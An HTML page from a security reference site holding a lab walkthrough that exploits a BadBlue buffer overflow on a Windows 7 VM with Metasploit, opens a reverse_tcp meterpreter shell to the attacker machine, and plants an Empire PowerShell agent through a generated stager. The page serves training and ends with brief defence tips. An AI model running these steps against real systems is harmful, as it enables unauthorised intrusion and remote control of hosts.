<!DOCTYPE html>
<!--[if lt IE 7]>       <html class="no-js ie6 oldie" lang="en"> <![endif]-->
<!--[if IE 7]>          <html class="no-js ie7 oldie" lang="en"> <![endif]-->
<!--[if IE 8]>          <html class="no-js ie8 oldie" lang="en"> <![endif]-->
<!--[if gt IE 8]><!-->  <html class="no-js" lang="en"> <!--<![endif]-->
<head>
    <title>Empire and Metasploit 101 - Information Security Reference</title>
    <meta name="description" content="My Stylish Documentation" />
    <meta name="author" content="I, Me & Myself">
    <meta charset="UTF-8">
    <link rel="icon" href="../../themes/daux/img/favicon-blue.png" type="image/x-icon">
    <!-- Mobile -->
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <!-- Font -->
    <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700&subset=latin,cyrillic-ext,cyrillic' rel='stylesheet' type='text/css'>
    <!-- CSS -->
    <link href='../../themes/daux/css/theme-blue.min.css' rel='stylesheet' type='text/css'>
            <!-- Tipue Search -->
        <link href="../../tipuesearch/tipuesearch.css" rel="stylesheet">
    
    <!--[if lt IE 9]>
    <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
</head>
<body class="">
    
<header class="Navbar hidden-print">
    <a class="Navbar__brand" href="../../index.html">Information Security Reference</a>

    <div class="Search">
        <svg class="Search__icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 451 451"><path d="M447.05 428l-109.6-109.6c29.4-33.8 47.2-77.9 47.2-126.1C384.65 86.2 298.35 0 192.35 0 86.25 0 .05 86.3.05 192.3s86.3 192.3 192.3 192.3c48.2 0 92.3-17.8 126.1-47.2L428.05 447c2.6 2.6 6.1 4 9.5 4s6.9-1.3 9.5-4c5.2-5.2 5.2-13.8 0-19zM26.95 192.3c0-91.2 74.2-165.3 165.3-165.3 91.2 0 165.3 74.2 165.3 165.3s-74.1 165.4-165.3 165.4c-91.1 0-165.3-74.2-165.3-165.4z"/></svg>
        <input type="search" id="tipue_search_input" class="Search__field" placeholder="Search..." autocomplete="on" results=25 autosave=text_search>
    </div>
</header>
<div class="Columns content">
    <aside class="Columns__left Collapsible">
        <div class="Collapsible__container">
            <button type="button" class="Button Collapsible__trigger">
                <span class="Collapsible__trigger--bar"></span>
                <span class="Collapsible__trigger--bar"></span>
                <span class="Collapsible__trigger--bar"></span>
            </button>
        </div>

        <div class="Collapsible__content">
            <!-- Navigation -->
            <ul class='Nav'><li class='Nav__item '><a href="../../Active_Directory.html">Active Directory</a></li><li class='Nav__item '><a href="../../AnonOpSecPrivacy.html">AnonOpSecPrivacy</a></li><li class='Nav__item '><a href="../../Archiving.html">Archiving</a></li><li class='Nav__item  has-children'><a href="#" class="aj-nav folder"><i class="Nav__arrow">&nbsp;</i>ATT&CK-Stuff</a><ul class='Nav'><li class='Nav__item  has-children'><a href="#" class="aj-nav folder"><i class="Nav__arrow">&nbsp;</i>ATT&CK</a><ul class='Nav'><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Collection.html">Collection</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Command_and_Control.html">Command and Control</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Credential_Access.html">Credential Access</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Defense_Evasion.html">Defense Evasion</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Discovery.html">Discovery</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Execution.html">Execution</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Exfiltration.html">Exfiltration</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Initial_Access.html">Initial Access</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Lateral Movement.html">Lateral Movement</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Persistence.html">Persistence</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Privilege_Escalation.html">Privilege Escalation</a></li></ul></li><li class='Nav__item  has-children'><a href="#" class="aj-nav folder"><i class="Nav__arrow">&nbsp;</i>Pre-ATT&CK</a><ul class='Nav'><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/# Establish & Maintain Infrastructure.html"># Establish & Maintain Infrastructure</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Adversary_OPSEC.html">Adversary OPSEC</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Build_Capabilities.html">Build Capabilities</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Organizationa_ Information_Gathering.html">Organizationa  Information Gathering</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Organizational_Weakness.html">Organizational Weakness</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/People_Information_Gathering.html">People Information Gathering</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/People_Weakness_Identification.html">People Weakness Identification</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Persona_Development.html">Persona Development</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Priority_Definition _lanning.html">Priority Definition  lanning</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Priority_Definition_Directive.html">Priority Definition Directive</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Stage_Capabilities.html">Stage Capabilities</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Target_Selection.html">Target Selection</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Technical_Information_Gathering.html">Technical Information Gathering</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Technical_Weakness_Identification.html">Technical Weakness Identification</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Test_Capabilities.html">Test Capabilities</a></li></ul></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/README.html">README</a></li></ul></li><li class='Nav__item '><a href="../../Basic.html">Basic</a></li><li class='Nav__item '><a href="../../bios_uefi.html">bios uefi</a></li><li class='Nav__item '><a href="../../Building_A_Lab.html">Building A Lab</a></li><li class='Nav__item '><a href="../../CandE.html">CandE</a></li><li class='Nav__item '><a href="../../Career.html">Career</a></li><li class='Nav__item '><a href="../../Cars.html">Cars</a></li><li class='Nav__item  has-children'><a href="#" class="aj-nav folder"><i class="Nav__arrow">&nbsp;</i>Cheat sheets reference pages Checklists -</a><ul class='Nav'><li class='Nav__item '><a href="../../Cheat sheets reference pages Checklists -/list_of_emoji.html">list of emoji</a></li><li class='Nav__item '><a href="../../Cheat sheets reference pages Checklists -/metasploit.html">metasploit</a></li><li class='Nav__item '><a href="../../Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.html">Nmap Cheat Sheet</a></li><li class='Nav__item '><a href="../../Cheat sheets reference pages Checklists -/Radare2.html">Radare2</a></li></ul></li><li class='Nav__item '><a href="../../Cheats.html">Cheats</a></li><li class='Nav__item '><a href="../../Cloud.html">Cloud</a></li><li class='Nav__item '><a href="../../Conferences.html">Conferences</a></li><li class='Nav__item '><a href="../../Containers.html">Containers</a></li><li class='Nav__item '><a href="../../Courses_Training.html">Courses Training</a></li><li class='Nav__item '><a href="../../Crypto_Encrypt.html">Crypto Encrypt</a></li><li class='Nav__item '><a href="../../CTFs_Wargames.html">CTFs Wargames</a></li><li class='Nav__item '><a href="../../Darknets.html">Darknets</a></li><li class='Nav__item '><a href="../../DataVis.html">DataVis</a></li><li class='Nav__item '><a href="../../Defense.html">Defense</a></li><li class='Nav__item '><a href="../../DFIR.html">DFIR</a></li><li class='Nav__item '><a href="../../Docs_and_Reports.html">Docs and Reports</a></li><li class='Nav__item '><a href="../../Embedded.html">Embedded</a></li><li class='Nav__item '><a href="../../Exfiltration.html">Exfiltration</a></li><li class='Nav__item '><a href="../../Exploit_Dev.html">Exploit Dev</a></li><li class='Nav__item '><a href="../../Fuzzing.html">Fuzzing</a></li><li class='Nav__item '><a href="../../Games.html">Games</a></li><li class='Nav__item '><a href="../../help.html">help</a></li><li class='Nav__item '><a href="../../honeypot.html">honeypot</a></li><li class='Nav__item '><a href="../../Interesting_Things.html">Interesting Things</a></li><li class='Nav__item '><a href="../../L-SM-TH.html">L-SM-TH</a></li><li class='Nav__item '><a href="../../Malware.html">Malware</a></li><li class='Nav__item '><a href="../../Network_Attacks.html">Network Attacks</a></li><li class='Nav__item '><a href="../../Osint.html">Osint</a></li><li class='Nav__item '><a href="../../Passwords.html">Passwords</a></li><li class='Nav__item '><a href="../../Phishing.html">Phishing</a></li><li class='Nav__item '><a href="../../Physical_Security.html">Physical Security</a></li><li class='Nav__item '><a href="../../Policy_Compliance.html">Policy Compliance</a></li><li class='Nav__item '><a href="../../Port_List.html">Port List</a></li><li class='Nav__item '><a href="../../PrivescPostEx.html">PrivescPostEx</a></li><li class='Nav__item '><a href="../../Programming_Language_Security.html">Programming Language Security</a></li><li class='Nav__item Nav__item--open has-children'><a href="#" class="aj-nav folder"><i class="Nav__arrow">&nbsp;</i>Rants&Writeups</a><ul class='Nav'><li class='Nav__item '><a href="../../Rants&Writeups/Bitcoin_Hack.html">Bitcoin Hack</a></li><li class='Nav__item '><a href="../../Rants&Writeups/Hacking Team Writeup.html">Hacking Team Writeup</a></li><li class='Nav__item '><a href="../../Rants&Writeups/Opsec_rant-alpraking.html">Opsec rant-alpraking</a></li><li class='Nav__item '><a href="../../Rants&Writeups/Opsec_rant2-nachash.html">Opsec rant2-nachash</a></li><li class='Nav__item Nav__item--open has-children'><a href="#" class="aj-nav folder"><i class="Nav__arrow">&nbsp;</i>Writeups</a><ul class='Nav'><li class='Nav__item Nav__item--active'><a href="../../Rants&Writeups/Writeups/Empire_and_Metasploit_101.html">Empire and Metasploit 101</a></li><li class='Nav__item '><a href="../../Rants&Writeups/Writeups/Lab_for_exploit_dev-basic.html">Lab for exploit dev-basic</a></li></ul></li></ul></li><li class='Nav__item '><a href="../../RE.html">RE</a></li><li class='Nav__item '><a href="../../Reverse Engineering - REMath Literature.html">Reverse Engineering - REMath Literature</a></li><li class='Nav__item '><a href="../../Rootkits.html">Rootkits</a></li><li class='Nav__item '><a href="../../RT.html">RT</a></li><li class='Nav__item '><a href="../../SCA.html">SCA</a></li><li class='Nav__item '><a href="../../SCADA.html">SCADA</a></li><li class='Nav__item '><a href="../../SE.html">SE</a></li><li class='Nav__item '><a href="../../sysinternals.html">sysinternals</a></li><li class='Nav__item '><a href="../../threatmodel.html">threatmodel</a></li><li class='Nav__item '><a href="../../UX.html">UX</a></li><li class='Nav__item '><a href="../../Web.html">Web</a></li><li class='Nav__item '><a href="../../Wireless.html">Wireless</a></li></ul>

            <div class="Links">
                
                                    <div class="CodeToggler">
                        <hr/>
                                                    <a class="CodeToggler__button CodeToggler__button--main" href="#">Show Code Blocks Inline</a><br>
                                            </div>
                
                            </div>
        </div>
    </aside>
    <div class="Columns__right ">
        <div class="Columns__right__content">
            <div class="doc_content">
                <article class="Page">

    <div class="Page__header">
        <h1><a href="../../Rants&Writeups/Bitcoin_Hack.html">Rants&Writeups</a> <svg class="Page__header--separator" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 477.175 477.175"><path d="M360.73 229.075l-225.1-225.1c-5.3-5.3-13.8-5.3-19.1 0s-5.3 13.8 0 19.1l215.5 215.5-215.5 215.5c-5.3 5.3-5.3 13.8 0 19.1 2.6 2.6 6.1 4 9.5 4 3.4 0 6.9-1.3 9.5-4l225.1-225.1c5.3-5.2 5.3-13.8.1-19z"/></svg> <a href="../../Rants&Writeups/Writeups/Empire_and_Metasploit_101.html">Writeups</a> <svg class="Page__header--separator" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 477.175 477.175"><path d="M360.73 229.075l-225.1-225.1c-5.3-5.3-13.8-5.3-19.1 0s-5.3 13.8 0 19.1l215.5 215.5-215.5 215.5c-5.3 5.3-5.3 13.8 0 19.1 2.6 2.6 6.1 4 9.5 4 3.4 0 6.9-1.3 9.5-4l225.1-225.1c5.3-5.2 5.3-13.8.1-19z"/></svg> <a href="../../Rants&Writeups/Writeups/Empire_and_Metasploit_101.html">Empire and Metasploit 101</a></h1>
                    </div>


    <div class="s-content">
        <p>Empire and Metasploit 101</p>
<p>Goal: Use Empire and metasploit in example situation of network exploitation and post-exploitation host enumeration. We will exploit a network service on a Windows 7 VM, and then use our low-privilege shell to then execute an empire powershell stager, which will create an Empire agent on the local Windows 7 VM. After this, we will look through the various options available as an Empire agent.
Following this, we will generate a DLL stager within Empire, and then use our existing meterpreter session on the Windows 7 VM to perform a DLL injection attack, to inject another Empire agent, directly into memory.</p>
<p>Pre-Stuff: Empire is not just for windows. It has python based agents that can run on OS X and Linux. It's communication profile between agents and listeners is configurable, similar to CobaltStrikes. You can use pre-built or custom-made ones to employ such functionality. Empire is designed to stay off disk and in memory as much as possible. Empire does contain modules that will not follow this and will touch disk. For information on Empire Modules, I recommend looking at the Github. That is where you will find the latest supported modules.</p>
<p>Related Links:</p>
<ul>
<li>
<p><a href="https://www.offensive-security.com/metasploit-unleashed/" class="external">Metasploit Unleashed Course</a></p>
</li>
<li>
<p><a href="https://enigma0x3.net/2015/08/26/empire-tips-and-tricks/" class="external">Empire Tips and Tricks</a></p>
</li>
<li>
<p><a href="https://github.com/EmpireProject/Empire" class="external">Empire Github</a></p>
</li>
<li>
<p><a href="https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/" class="external">Meterpreter basics - Metasploit Unleashed</a></p>
</li>
<li>
<p><a href="http://www.powershellempire.com/?page_id=104" class="external">Stagers - Empire</a></p>
</li>
<li>
<p><a href="https://www.powershellempire.com/?page_id=106" class="external">Agents 101 - powershellempire.com</a></p>
</li>
</ul>
<p>Required Software:</p>
<p>Download Windows 7 VM
* https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/</p>
<p>Software to download/install within the Windows 7 VM:
* <a href="https://www.exploit-db.com/exploits/16806/" class="external">BadBlue - ExploitDB</a>
* <a href="https://www.exploit-db.com/apps/396bedff015be885c1719f39f4561081-badblue.tar_.gz" class="external">Application</a>
* Unzip the <code>.tar</code> file with 7zip, and then extract the resulting zip file to end with the installer .exe.</p>
<p>Download Kali VM
* https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/</p>
<p>Commads to run/Software to install within the Kali VM:
* Update repos
* 'apt update &amp;&amp; apt upgrade -y'
* Empire <a href="http://www.powershellempire.com/?page_id=110" class="external">QuickStart</a>
* https://github.com/EmpireProject/Empire
* 'git clone '
* 'cd Empire'
* './setup/install.sh'
* './setup/setup_database.py'
* Empire is now setup and configured!</p>
<p>I leave it to the reader to import/configure both VMs to their particular desired environment/virtualization platform. For this document, I will assume both machines are within the same subnet of <code>1.1.254.*.</code></p>
<p>Kali VM - 1.1.254.2
Windows 7 VM - 1.1.254.5</p>
<p>Steps:</p>
<ul>
<li>Turn on both virtual machines. Ensure everything is working correctly so far.</li>
<li>Kali:
<ul>
<li>
<p>Launch Metasploit
* msfconsole</p>
<ul>
<li>Launch the postgres DB</li>
<li>Perform a network scan on the windows machine to look for vulnerable services:
<ul>
<li>db_nmap -sS -sV --version-intensity=0 -p80 1.1.254.5</li>
</ul>
</li>
<li>Perform a search for the string 'badblue 2.7'</li>
<li>Note the module 'BadBlue 2.72b PassThru Buffer Overflow'</li>
<li>Use/load the module:
<ul>
<li>'use exploit/windows/http/badblue_passthru'</li>
</ul>
</li>
<li>Display the available targets
<ul>
<li>'show targets'</li>
</ul>
</li>
<li>Display the available options
<ul>
<li>'show options'</li>
</ul>
</li>
<li>Set RHOST
<ul>
<li>'set RHOST 1.1.254.5'</li>
</ul>
</li>
<li>Set a payload
<ul>
<li>For this, we'll use the regular reverse_tcp meterpreter</li>
<li>'set payload windows/meterpreter/reverse_tcp'</li>
</ul>
</li>
<li>Show payload options
<ul>
<li>'show payload options'</li>
</ul>
</li>
<li>Set LHOST for the payload(needs to callback to somewhere)
<ul>
<li>'set LHOST 1.1.254.2'</li>
</ul>
</li>
<li>Show options one more time to make sure everything is correct
<ul>
<li>'show options'</li>
</ul>
</li>
<li>If everything is good, just type:
<ul>
<li>'run' and hit enter.</li>
</ul>
</li>
<li>Congratulations! You should now have an active meterpreter session and be sitting at a meterpreter prompt.</li>
<li>Try typing 'help' to see available commands
<ul>
<li>
<a href="https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/" class="external">Meterpreter basics - Metasploit Unleashed</a>
</li>
<li>
<a href="https://github.com/rapid7/metasploit-framework/wiki/Meterpreter" class="external">Meterpreter Documentation</a>
</li>
</ul>
</li>
<li>For now, we're going to leave this be. Simply open another terminal, and go onto the next part.</li>
</ul>
<hr />
</li>
<li>
<p>Empire</p>
<ul>
<li>cd into the directory where you downloaded/installed Empire</li>
<li>run Empire with the command ./empire</li>
<li>About Empire:
<ul>
<li>General workflow: Create listener -&gt; Create stager -&gt; Stager instantiates/pulls down/runs an Agent</li>
<li>Creating listeners in Empire is done by entering the listener menu, setting the appropriate options, and then issuing the command 'execute'</li>
</ul>
</li>
<li>Enter the 'listener' menu
<ul>
<li>'listeners'</li>
</ul>
</li>
<li>Show the options available for listeners
<ul>
<li>'show options'</li>
</ul>
</li>
<li>Set your desired option changes
<ul>
<li>'set Name Test1A'</li>
</ul>
</li>
<li>Run Listener
<ul>
<li>'run'</li>
</ul>
</li>
<li>This instantiates the listener and causes it to start listening for agents</li>
</ul>
<hr />
<ul>
<li>Generate a Stager <a href="http://www.powershellempire.com/?page_id=104" class="external">Stagers - Empire</a>
<ul>
<li>Generating agents in Empire is similar to creating listeners</li>
</ul>
</li>
<li>enter the command
<ul>
<li>'back'</li>
</ul>
</li>
<li>This should put you back at the Empire main menu. If not, keep issuing the back command until you find yourself at the main menu</li>
<li>Once at the main menu, type the command
<ul>
<li>'usestager'</li>
<li>then press tab twice</li>
<li>This will list all available stagers for use</li>
<li>For now, we are only concerned with the 'launcher' stager</li>
</ul>
</li>
<li>Type the command
<ul>
<li>'usestager launcher'</li>
</ul>
</li>
<li>You will now be in the 'stager/launcher' menu</li>
<li>Type the command
<ul>
<li>'options'</li>
<li>This will show you all available options for the currently selected stager</li>
</ul>
</li>
<li>We want to set the options 'Listener' and 'OutFile'</li>
<li>To enable the launcher to use our previously configured listener, issue the command
<ul>
<li>'set Listener Test1A'
<ul>
<li>This will set our previously created listener as our new agents listener</li>
</ul>
</li>
</ul>
</li>
<li>Type the command
<ul>
<li>'set OutFile /tmp/test1'
<ul>
<li>This will store the stager command generated in a text file. After generating the stager command, we will copy it from the designated file and run it.</li>
</ul>
</li>
</ul>
</li>
<li>Verify everything is correct with the command
<ul>
<li>'options'</li>
</ul>
</li>
<li>Once verified, now type
<ul>
<li>'generate'</li>
</ul>
</li>
<li>This will generate your configured&amp;customized stager. It will be stored at the previously set file location, '/tmp/test'.</li>
<li>We then want to navigate to the txt file, open it, and copy the single line of txt. This is the encoded powershell command that will download an agent from your listener</li>
</ul>
<hr />
<ul>
<li>Instantiating the agent</li>
<li>Now, go back to your meterpreter session you created earlier, and issue the command
<ul>
<li>'shell'
<ul>
<li>This will drop you to a system shell prompt. Perfect for executing that one line powershell command.</li>
</ul>
</li>
</ul>
</li>
<li>Paste the command you copied earlier into the current shell prompt and hit enter. You should receive no confirmation on your windows command prompt. You should however receive a notice on your other command prompt, that you have a new agent in Empire!</li>
</ul>
<hr />
<ul>
<li>Interacting with the agent</li>
<li>At the Empire command menu, you should see an alert for a new agent, with a name consisting of a series of semi-random alphanumeric characters</li>
<li>To interact with and issue commands to your new agent, you must issue the following command from the main menu of the Empire command menu
<ul>
<li>'agents'</li>
</ul>
</li>
<li>Then
<ul>
<li>'interact 'Agent_Name_Here''</li>
</ul>
</li>
<li>At this point, you will be issuing commands to the selected agent. Empire is <em>NOT</em> a real time tool. Empire works by giving agents tasks to perform, and then the agents report the results to the corresponding listener. Users can issue commands and have near-real time response times through an agent, however, they should not be thought of as a real-time interactive terminals, and more as a errand-boys running tasks.</li>
</ul>
<hr />
<ul>
<li>Using the Agent</li>
<li>Using agents are accomplished by issuing them tasks.</li>
<li>
<a href="https://www.powershellempire.com/?page_id=106" class="external">Agents 101 - powershellempire.com</a>
</li>
<li>Specifically, the 'usemodule' command is of specific interest.</li>
<li>If we double tap tab here,we can see all available command modules available currently.
<ul>
<li>Or we can check Empire's current main modules on github: <a href="https://github.com/EmpireProject/Empire/tree/master/data/module_source" class="external">Link</a>
</li>
<li>Most of them are very nicely documented within the code/have a brief description at the top of the file. If you are running it, you should probably know what it does.</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>Tips for defending against this:
* Procmon process logging
* Network Logging
* Hunting empire</p>
    </div>

        <nav>
        <ul class="Pager">
            <li class=Pager--prev><a href="../../Rants&Writeups/Opsec_rant2-nachash.html">Previous</a></li>            <li class=Pager--next><a href="../../Rants&Writeups/Writeups/Lab_for_exploit_dev-basic.html">Next</a></li>        </ul>
    </nav>
    </article>

            </div>
        </div>
    </div>
</div>

    
    <!-- jQuery -->
    <script src="../../themes/daux/js/jquery-1.11.3.min.js"></script>

    <!-- hightlight.js -->
    <script src="../../themes/daux/js/highlight.pack.js"></script>
    <script>hljs.initHighlightingOnLoad();</script>

    <!-- JS -->
    
    <script src="../../themes/daux/js/daux.js"></script>

            <!-- Tipue Search -->
        <script type="text/javascript" src="../../tipuesearch/tipuesearch.js"></script>

        <script>
            window.onunload = function(){}; // force $(document).ready to be called on back/forward navigation in firefox
            $(function() {
                tipuesearch({
                    'base_url': '../../'
                });
            });
        </script>
    
</body>
</html>
